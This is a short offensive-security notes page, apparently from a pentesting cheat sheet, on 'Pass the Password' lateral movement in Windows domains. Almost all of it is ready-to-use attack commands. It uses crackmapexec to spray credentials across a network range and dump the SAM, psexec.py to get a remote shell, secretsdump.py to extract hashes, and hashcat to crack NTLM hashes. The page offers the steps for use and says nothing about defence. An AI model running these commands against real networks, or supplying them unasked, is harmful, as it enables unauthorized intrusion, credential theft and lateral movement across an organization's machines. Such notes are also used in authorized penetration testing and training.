Pass the Password
The basic syntax using crackmapexec :
crackmapexec <entire network ip>/<cidr> -d domain -u user -p password
I recommend you check this article too to learn a bit more about the usage of cme :
Once you get the pwn3d machines you can psexec or so, or you can even use some modules and options provided by crackmapexec as shown in the blog. so for example :
To dump the sam file (depends, sometimes it doesn't work) :
crackmapexec <entire network ip>/<cidr> -d domain -u user -p password --sam
psexec :
psexec.py domain/username:password@ip_of_the_machine
secretsdump to dump hashes :
secretsdump.py domain/username:password@ip_of_the_machine
once you dump that and you get the NTLM hashes you can use for example hashcat to crack it (basic command):
hashcat -m 1000 hashfile dict_file -O
you can find more of these cool stuff here :
Last updated
Was this helpful?